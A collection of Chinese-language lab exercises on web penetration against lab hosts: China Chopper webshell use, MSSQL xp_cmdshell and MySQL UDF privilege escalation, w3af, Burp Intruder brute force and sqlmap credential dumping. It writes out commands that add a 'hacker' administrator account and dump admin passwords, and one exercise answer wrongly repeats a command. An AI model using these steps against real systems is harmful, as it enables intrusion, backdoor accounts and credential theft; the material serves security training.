中国菜刀配合一句话木马基本使用
菜刀的主要功能是用来连接一句话木马的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。连接一句话木马,首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。也可以把一句话单独写在一个文件里,比如新建了一个php文件,这个php文件的全部内容就只有一个一句话,也是可以的。
一、上传一句话木马
1.1 在火狐浏览器输入URLhttp://192.168.1.3:8080/up
,打开【文件上传漏洞演示脚本】,点击【中国菜刀连接一句话木马】。
1.2 点击【浏览】,选择【C:\实验工具集\01_WEB安全\04_webshell上传技术\第14节 中国菜刀配合一句话木马基本使用】下的php文件,点击【上传】,记录木马地址为【http://192.168.1.3:8080/up /images/lubr.php】
二、菜刀连接
2.1 在工具箱中找到【中国菜刀】,进入目录,点击【chopper.exe】,即可打开中国菜刀页面。
2.2 右键点击下方空白处,点击【添加】,弹出页面,在地址栏中添加上传文件的路径http://192.168.1.3:8080/up/images/lubr.php
,在右侧框中添加密码【lubr】,脚本类型为【PHP(Eval)】。
2.3 点击【添加】,则在主界面上,显示一条目录。
三、相关操作
3.1 右键点击【文件管理】,即可查看目标服务器的完整目录,也可进行创建文件,修改文件,上传,下载等相关操作。
3.2 右键单击【浏览网站】,也可实现浏览器功能,浏览该站点。
四、课后思考
如何将一句话木马插入到正常的网页文件中,并上传到服务器?
- 利用00截断,brupsuite上传
- 构造服务器端扩展名检测上传
- 绕过Content-Type检测文件类型上传
- 构造图片木马,绕过文件内容检测上传Shell
MSSqlserver xp_cmdshell提权
通过webshell读取网站数据库连接配置文件,获取数据库连接密码。通过webshell上用xp_cmdshell添加系统帐号。
一、利用webshell读取服务器信息,发现服务器系统安装mssql2005数据库
1.1在浏览器中输入http://192.168.1.3:8000/2.asp
, 输入默认密码(123456)。
1.2单击“端口扫描”->“开始扫描”, 发现1433端口开放,安装有mssql数据库。
1.3单击“数据库操作”,在右侧下拉列表mssql连接,输入相应的数据库名称master,密码123456,在SQL操作命令中输入“select count(*)from master.dbo.sysobjects where xtype = ‘x’ and name = ‘xp_cmdshell’”查看cmd_shell是否开启。
1.4命令回显为1,cmd_shell为开启。
1.5添加系统账号,在SQL操作命令中输入“Exec master.dbo.xp_cmdshell ‘net user hacker 123456 /add’”,没有回显表示命令成功。
1.6在SQL操作命令中输入
Exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add’
将hacker加入管理员组。1.7单击“用户帐号”查看添加hacker账号。
1.8单击”scan”按钮,查看端口号。
1.9用新加的用户hacker连接服务器远程桌面。
二、课后思考
如何在命令行下建立隐藏用户?
在命令行中输入
Exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add’
。
MysqlUDF提权
通过webshell读取网站数据库连接配置文件,获取数据库连接密码。通过webshell上传mysql-udf文件,添加系统用户。
一、利用webshell读取服务器信息,发现服务器系统安装mysql数据库
1.1在浏览器中输入http://192.168.1.3:8080/webshell.php
, 输入默认密码(admin)。
1.2单击“端口扫描”“开始扫描”, 发现3306端口开放,安装有Mysql数据库。
1.3利用Mysql_udf提权,单击“mysql-udf提权”,在右侧输入已知的数据库连接用户名和密码。
1.4单击“安装DLL”按钮。
1.5在下拉列表框中选择”添加管理员”,单击”执行”按钮。
1.6在下拉列表框中选择”设为管理员组”,单击”执行”按钮并加入管理员组。
1.7选择菜单栏中的“CMD命令”,下拉列表框中选择“net user”,然后单击“执行按钮”。
1.8选择菜单栏中的“CMD命令”,下拉列表框中选择“netstat -an”,然后单击“执行按钮”。
1.9用新加的用户spider连接服务器远程桌面。
Web应用程序攻击和检查框架w3af
W3AF是一个web应用安全的攻击、审计平台,通过增加插件来对功能进行扩展。这是一款用python写的工具,可以查看所有源代码。支持GUI,也支持命令行模式。
一、启动w3af软件
1.1 单击桌面空白处,右键菜单选择“在终端中打开”。
1.2 在终端中输入命令“w3af_console”,启动控制台。W3af有两种用户界面:控制台界面和图形界面。
1.3 在终端中输入命令“help”,显示可用的命令参数。
1.4 对命令参数的详细帮助可以使用help命令显示出来,例如help start。
1.5 进入到配置菜单后,输入某个菜单即可切换到此菜单模式下,所有配置菜单均提供以下命令:help、view、set、back。这里选择target菜单。
1.6 “view”命令用来列出所有可配置参数,set命令用来改变一个值,back命令返回上一层菜单。可以使用help参数名称,获取每一个配置参数的详细的帮助。
二、探测目标网站结构
2.1 在终端中输入命令“w3af_console”,启动w3af。
2.2 启动插件。
2.3 启用find_backdoors、phpinfo和web_spider这三个插件。
2.4 列出所有用于漏洞的插件。
2.5 启用blind_sqli、file_upload、os_commanding、sqli和xss这五个插件。
2.6 设置输出插件。
2.7 设置输出信息的存储文件。
2.8 查看存储设置参数。
2.9 设置目标地址参数。
2.10 开始攻击。
三、课后习题
实验中是否探测出目标系统的版本,如果没有,请问如何使探测更加准确?
没有
Burp suite基本配置介绍
Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。本文将做一个Burp Suite完全正的演练.
一、Burp Suite介绍
1.1Proxy(代理),代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,浏览器发送的数据先通过Burp Suite软件,然后再提交给目标网站.在浏览器上设置代理服务器地址和端口号。Burp Suite默认的代理地址为127.0.0.1 端口号为8080。打开浏览器页面,单击“右上角红色方框”-〉“Preferences”。
1.2单击“network”->”setting”。
1.3在打开的界面选择“Manual proxy configuration”->”HTTP Proxy”。输入“127.0.0.1”和port”8080”。
1.4单击桌面空白处,右键菜单选择“在终端中打开”。
1.5在命令终端中输入命令“burpsuite”,启动burpsuite软件。
1.6在proxy标签下,显示了软件的默认代理设置。
1.7打开Burp Suite,标签”Proxy”->”intercept”,进行Intercept(截断),需要确保intercept is on,Burp Suite开始截断网页和服务器之间的数据包了,只有单击了“Forward”按钮,数据包才能交互。
1.8如果intercept is off,表示网页和服务器交互的数据包通过Burp Suite,但Burp Suite软件不截取数据包。
二、实验思考
请挖掘burpspider的其它功能?
Burp spider工具详解
- Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。本文将做一个Burp Suite完全正的演练。
一、Burp Suite介绍
1.1Proxy(代理),代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,浏览器发送的数据先通过Burp Suite软件,然后再提交给目标网站.在浏览器上设置代理服务器地址和端口号。Burp Suite默认的代理地址为127.0.0.1 端口号为8080。打开浏览器页面,单击“右上角红色方框”-〉“Preferences”。
1.2单击“network”->”setting”。
1.3在打开的界面选择“Manual proxy configuration”->”HTTP Proxy”。输入“127.0.0.1”和port”8080”。
1.4单击桌面空白处,右键菜单选择“在终端中打开”。
1.5在命令终端中输入命令“burpsuite”,启动burpsuite软件。
1.6在proxy标签下,显示了软件的默认代理设置。
1.7打开Burp Suite,标签”Proxy”->”intercept”,进行Intercept(截断),需要确保intercept is on,Burp Suite开始截断网页和服务器之间的数据包了,只有单击了“Forward”按钮,数据包才能交互。
二、spider
2.1 用浏览器打开http://192.168.1.2:8008
,确保Burp Spider软件中的”Intercept is on”打开。在Raw标签下显示网页信息。
2.2 确保Burp Suite上的inerrcept is on,并且得到Brup截取的请求,右键单击拦截的请求,选择”Send to Spider”发送给蜘蛛。
2.3 将Burp Suite上的inerrcept is off。
2.4 单击Target标签,查看sqider结果。
2.5 在Target标签下,可以右键单击已经扫描出来的连接,再次选择”spider from here”选项,继续深入扫描。
Burp intruder暴力攻击web口令
一、Burp Suite介绍
1.1Proxy(代理),代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,浏览器发送的数据先通过Burp Suite软件,然后再提交给目标网站.在浏览器上设置代理服务器地址和端口号。Burp Suite默认的代理地址为127.0.0.1 端口号为8080。打开浏览器页面,单击“右上角红色方框”-〉“Preferences”。
1.2单击“network”->”setting”。
1.3在打开的界面选择“Manual proxy configuration”->”HTTP Proxy”。输入“127.0.0.1”和port”8080”。
1.4单击桌面空白处,右键菜单选择“在终端中打开”。
1.5在命令终端中输入命令“burpsuite”,启动burpsuite软件。
1.6在proxy标签下,显示了软件的默认代理设置。
1.7打开Burp Suite,标签”Proxy”->”intercept”,进行Intercept(截断),需要确保intercept is on,Burp Suite开始截断网页和服务器之间的数据包了,只有单击了“Forward”按钮,数据包才能交互。
二、入侵
2.1Burp Intruder可以用于利用漏洞,模糊测试,暴力猜解等。在这种情况下我们将使用Burp Suite的Intruder对
http://192.168.1.3:8008
进行暴力猜解攻击。在浏览器中输入 http://192.168.1.3:8008/admin/adminlogin.asp
,为后台登陆界面。用户名:”admin”、密码:”123456”。单击提交按钮。2.2单击“Proxy”->”Intercept”,软件截取到包含用户名和密码的数据包。
2.3右键菜单选择“send to intruder”,把数据包发送到“Intruder”界面。
2.4单击“Intruder”->”positions”标签。
2.5单击”clear$”按钮,然后选中数字123456,然后单击add$按钮。
2.6单击Payloads标签,在“payload options(simple list)”单击“add”按钮,添加破解的密码参数。
2.7在Options标签,选中红色方框标注的地方。
2.8单击菜单栏中的Intruder标签页,选择“start attack”。
2.9在弹出的对话框中,看到http状态为302标签,表示密码破解成功。
Sqlmap数据库注入攻击
SQLMap是一个先进的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。目前支持的数据库管理系统包括Ms-soL、MySQL、Oracde和PostgreSQL.也能够识别诸如DB2、Informix. Sybase、Interbase和MS Access之类的数据库系统。SQLMap采用四种独特的SQL注入技术,分别是盲推理SQL注入、UNION查询SQL注入、堆查询和基于时间的SQL盲注人。其广泛的功能和选项包括数据库指纹、枚举、数据提取、访问目标文件系统,并在获取完全操作权限时执行任意命令。此外,该工具还可以从Burp Proxy直Web Scarab日志及标准的文本文件中解析目标列表。更突出的是,它提供采用分类Coogle dorks扫描Oragle拽索引擎,获取指定目标的功能。
一、Sqlmap破解access数据库
1.1单击桌面空白处,右键菜单选择“在终端中打开”。
1.2在终端中输入命令sqlmap –u http://192.168.1.3:8008/onews.asp?id=45
,-u扫描注入点扫描目标主机,检测出的信息准确。
1.3在终端中输入命令
sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 --users
,获取到用户名。1.4在终端中输入命令
sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 -–dump –tables
,探测数据库和表信息。1.5显示探测出来的字段信息。
1.6针对admin表探测出的结构。
1.7在终端中输入命令
sqlmap -u "http://192.168.1.3/shownews.asp?id=232" --dump -T admin -C admin,password
”,进行暴库,获得用户名和密码。1.8已经猜解出来用户名为admin。
二、课后习题
-d DIRECT 的作用是直接连接到数据库。